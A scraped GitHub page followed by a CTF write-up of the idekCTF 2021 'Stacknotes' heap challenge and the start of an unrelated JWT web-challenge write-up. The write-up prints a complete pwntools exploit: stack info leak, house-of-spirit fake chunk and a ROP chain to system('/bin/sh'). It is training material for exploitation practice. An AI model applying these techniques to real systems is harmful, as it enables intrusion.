<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/GonTanaka/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":437949506,"originating_url":"https://github.com/GonTanaka/CTF-Writeups/tree/main/idekCTF-2021/pwn","user_id":null}}" data-hydro-click-hmac="547c9b040bad7c38899cec1e7859b12be618f29ac7e1bf8ef0a734ee54a7a8b4"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/GonTanaka/CTF-Writeups/refs" cache-key="v0:1655044557.692943" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="R29uVGFuYWthL0NURi1Xcml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/GonTanaka/CTF-Writeups/refs" cache-key="v0:1655044557.692943" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="R29uVGFuYWthL0NURi1Xcml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>idekCTF-2021</span></span><span>/</span>pwn<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>idekCTF-2021</span></span><span>/</span>pwn<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/GonTanaka/CTF-Writeups/tree-commit/43ab77611a7db8f4eae3fde0cc50c0e1e81cefde/idekCTF-2021/pwn" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/GonTanaka/CTF-Writeups/file-list/main/idekCTF-2021/pwn"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="Directory" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-directory-fill hx_color-icon-directory"> <path d="M1.75 1A1.75 1.75 0 0 0 0 2.75v10.5C0 14.216.784 15 1.75 15h12.5A1.75 1.75 0 0 0 16 13.25v-8.5A1.75 1.75 0 0 0 14.25 3H7.5a.25.25 0 0 1-.2-.1l-.9-1.2C6.07 1.26 5.55 1 5 1H1.75Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Vanity_Check_I</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="Directory" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-directory-fill hx_color-icon-directory"> <path d="M1.75 1A1.75 1.75 0 0 0 0 2.75v10.5C0 14.216.784 15 1.75 15h12.5A1.75 1.75 0 0 0 16 13.25v-8.5A1.75 1.75 0 0 0 14.25 3H7.5a.25.25 0 0 1-.2-.1l-.9-1.2C6.07 1.26 5.55 1 5 1H1.75Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>cached</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="Directory" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-directory-fill hx_color-icon-directory"> <path d="M1.75 1A1.75 1.75 0 0 0 0 2.75v10.5C0 14.216.784 15 1.75 15h12.5A1.75 1.75 0 0 0 16 13.25v-8.5A1.75 1.75 0 0 0 14.25 3H7.5a.25.25 0 0 1-.2-.1l-.9-1.2C6.07 1.26 5.55 1 5 1H1.75Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>handout</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Stacknotes
was pwn challenge from idekCTF 2021
it was a heap challenge,
nice menu as you can see :)
the source code was provided, but you have to study the binary also to understand how to exploit it...
in the original source code you can see, the stacknote (c)reate function:
you can see that you can allocate a chunk up to 0x1000 bytes, that is allocated with malloca..
but, compiler's produced malloca code shows that chunks below 512 bytes will be allocated on stack (and aligned),
and that chunks above 512 bytes will be allocated with malloc.. that's important to know for the rest of the exploitation
So first, we will allocate a chunk on stack, and as alloca does not clear the allocated chunk,
we will leak the usefull values already present on stack in this chunk:
* the libc address of `_IO_2_1_stdout_` that we will use to calculate libc mapping address base..
* an address belonging to the program, that we will use to calculate prog base
No we allocate another chunk of 31bytes on stack , it will be just before our first chunk (as stack grows downward)
and we will create a fake chunk, to make a "house of spirit" attack.. a chunk of 0x300 size...
now we delete our first bloc, that will go in 0x300 chunk list..
when we allocate it again, we will get a chunk on stack (bigger than the original),
where we can directly write our ROP over the return address (and jumping over the canary)..
and that's it we got shell
ok...
If you understand nothing on my explanation,
you can read the code...
```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *
context.update(arch="amd64", os="linux")context.log_level = 'info'
exe = ELF('./stacknotes')libc = ELF('./libc.so.6')rop = ROP(exe)
host, port = "stacknotes.chal.idek.team", "1337"
if args.REMOTE: p = remote(host,port)else: p = process(exe.path)
def create(idx,size): p.sendlineafter('> ','c') p.sendlineafter('note?\n', str(idx)) p.sendlineafter('note?\n', str(size))
def write(idx,data): p.sendlineafter('> ','w') p.sendlineafter('in?\n', str(idx)) p.sendafter('content:\n', data)
def delete(idx): p.sendlineafter('> ','d') p.sendlineafter('delete?\n', str(idx))
def view(idx): p.sendlineafter('> ','v') p.sendlineafter('view\n', str(idx))
# create a buffer on stackcreate(0,112)# leak various usefull address on stackview(0)
p.recvuntil('Note:\n', drop=True)buff = p.recv(112)
libc.address = u64(buff[0:8]) - libc.sym['_IO_2_1_stdout_']print('libc base = '+hex(libc.address))progbase = u64(buff[8:16]) - 0x2224print('prog base = '+hex(progbase))
create(1,31)# House of spirit , create a false chunk on stackwrite(1,p64(0)*3+'\x00\x03'+'\x00'*5)# put fake chunk in tcache listdelete(0)
# get our big chunk allocated on stackcreate(2,0x2f0)view(2)p.recvuntil('Note:\n', drop=True)buff = p.recv(0x2f0)buff = bytearray(buff)
pop_rdi = progbase+rop.find_gadget(['pop rdi', 'ret'])[0]ret = progbase+rop.find_gadget(['ret'])[0]
# directly wrote a ROP at return address on stack (system('/bin/sh'))buff[152:160] = p64(pop_rdi)buff[160:168] = p64(next(libc.search('/bin/sh')))buff[168:176] = p64(ret)buff[176:184] = p64(libc.sym['system'])
# write our modified bufferwrite(2, bytes(buff))
# got shellp.sendlineafter('> ','e')
p.sendline('id;cat /flag*')p.interactive()```
*nobodyisnobody still pwning things...* |
Accessing the link provided in the challenge, a web page is served with a simple login and register. Registering an account and login in after, a new link appears (*/administration*) and a cookie **token**.
Accessing the administration page we are received with: **No bussiness here!**.
Looking into the token, by the way its constructed looks like a JWT. Using https://jwt.io/ to decode it, the results are:
